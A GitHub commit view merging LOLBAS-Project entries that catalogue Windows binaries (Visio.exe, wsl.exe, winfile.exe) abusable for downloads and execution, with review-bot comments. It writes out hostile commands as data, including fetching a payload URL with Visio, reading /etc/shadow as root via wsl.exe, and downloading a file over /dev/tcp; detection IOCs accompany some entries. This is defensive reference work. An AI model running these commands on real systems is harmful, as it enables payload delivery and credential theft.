Merge branch 'LOLBAS-Project:master' into XBootMgrSleep

This commit is contained in:
Avihay Eldad
2024-06-13 11:05:12 +03:00
committed by GitHub
7 changed files with 115 additions and 28 deletions

View File

@@ -0,0 +1,34 @@
---
Name: Visio.exe
Description: Microsoft Visio Executable
Author: Avihay Eldad
Created: 2024-02-15
Commands:
- Command: Visio.exe https://example.com/payload
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in INetCache.
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows
Tags:
- Download: INetCache
Full_Path:
- Path: C:\Program Files (x86)\Microsoft Office\Office14\Visio.exe
- Path: C:\Program Files\Microsoft Office\Office14\Visio.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office15\Visio.exe
- Path: C:\Program Files\Microsoft Office\Office15\Visio.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office16\Visio.exe
- Path: C:\Program Files\Microsoft Office\Office16\Visio.exe
- Path: C:\Program Files (x86)\Microsoft Office\root\Office14\Visio.exe
- Path: C:\Program Files\Microsoft Office\root\Office14\Visio.exe
- Path: C:\Program Files (x86)\Microsoft Office\root\Office15\Visio.exe
- Path: C:\Program Files\Microsoft Office\root\Office15\Visio.exe
- Path: C:\Program Files (x86)\Microsoft Office\root\Office16\Visio.exe
- Path: C:\Program Files\Microsoft Office\root\Office16\Visio.exe
Detection:
- IOC: URL on a visio.exe command line
- IOC: visio.exe making unexpected network connections or DNS requests
Acknowledgement:
- Person: Avihay Eldad
Handle: '@AvihayEldad'
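Review bot: the Visio.exe entry has no `Resources:` section, unlike the winfile.exe entry added in this same commit; add a link to the write-up or issue that documents Visio fetching a URL passed on its command line into INetCache, so the behaviour and the Office14/15/16 path coverage can be verified by readers. The `Detection:` block could also pair the two network IOCs with a file-creation IOC for files written under the user's INetCache directory by `visio.exe`, since that is the artefact the Usecase line describes.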

View File

@@ -10,35 +10,28 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 19 Server
OperatingSystem: Windows 10, Windows Server 2019, Windows 11
- Command: wsl.exe -u root -e cat /etc/shadow
Description: Cats /etc/shadow file as root
Usecase: Performs execution of arbitrary Linux commands as root without need for password.
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 19 Server
- Command: wsl.exe --exec bash -c 'cat file'
Description: Cats /etc/shadow file as root
OperatingSystem: Windows 10, Windows Server 2019, Windows 11
- Command: wsl.exe --exec bash -c "<command>"
Description: Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u <username>`) on the default WSL distro (unless stated otherwise using `-d <distro name>`)
Usecase: Performs execution of arbitrary Linux commands.
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 19 Server
- Command: wsl.exe --system calc.exe
Description: Execute the command as root
Usecase: Performs execution of arbitrary Linux commands as root without need for password.
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows 11
OperatingSystem: Windows 10, Windows Server 2019, Windows 11
- Command: wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
Description: Downloads file from 192.168.1.10
Usecase: Download file
Category: Download
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 19 Server
MitreID: T1105
OperatingSystem: Windows 10, Windows Server 2019, Windows 11
Full_Path:
- Path: C:\Windows\System32\wsl.exe
Code_Sample:
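Review bot: the `OperatingSystem` line for the `wsl.exe --system calc.exe` command is broadened from `Windows 11` to `Windows 10, Windows Server 2019, Windows 11`, but `--system` depends on the installed WSL version rather than the Windows release; please confirm it works with the in-box WSL on those releases, or state the minimum WSL version in the Description. The rest of the hunk reads well: the copy-pasted "Cats /etc/shadow file as root" description is replaced by a generic `--exec bash -c "<command>"` entry whose description matches the command, the download command now carries `MitreID: T1105` instead of T1202, and the "Windows 19 Server" typo is corrected throughout.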
@@ -59,3 +52,4 @@ Acknowledgement:
Handle: '@d1r4c'
- Person: Nasreddine Bencherchali
Handle: '@nas_bench'
- Person: Konrad 'unrooted' Klawikowski
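Review bot: the new acknowledgement line `- Person: Konrad 'unrooted' Klawikowski` has no `Handle:` field, while the two entries above it (`'@d1r4c'`, `'@nas_bench'`) do; add a Handle line for consistency with the file's schema, or leave a note if the contributor has no public handle.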

View File

@@ -0,0 +1,24 @@
---
Name: winfile.exe
Description: Windows File Manager executable
Author: Avihay Eldad
Created: 2024-04-30
Commands:
- Command: winfile.exe calc.exe
Description: Execute an executable file with WinFile as a parent process.
Usecase: Performs execution of specified file, can be used as a defense evasion
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\winfile.exe
- Path: C:\Windows\winfile.exe
- Path: C:\Program Files\WinFile\winfile.exe
- Path: C:\Program Files (x86)\WinFile\winfile.exe
- Path: C:\Program Files\WindowsApps\Microsoft.WindowsFileManager_10.3.0.0_x64__8wekyb3d8bbwe\WinFile\winfile.exe
Resources:
- Link: https://github.com/microsoft/winfile
Acknowledgement:
- Person: Avihay Eldad
Handle: '@AvihayEldad'
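Review bot: the `Full_Path` list includes `C:\Windows\System32\winfile.exe` and `C:\Windows\winfile.exe`, but the linked resource (https://github.com/microsoft/winfile) distributes WinFile through the Microsoft Store and GitHub releases rather than as an in-box Windows component, so those two locations look speculative; keep the Store package path and the `WinFile` program-folder paths, and document where the remaining ones come from or drop them. The `WindowsApps` path pins package version `10.3.0.0`, which changes with each update, so note that in the entry. Finally, the entry has no `Detection:` section; since the Usecase is parent-process spoofing, an IOC such as `winfile.exe` spawning an unexpected child process would match the style of the Visio entry in this commit.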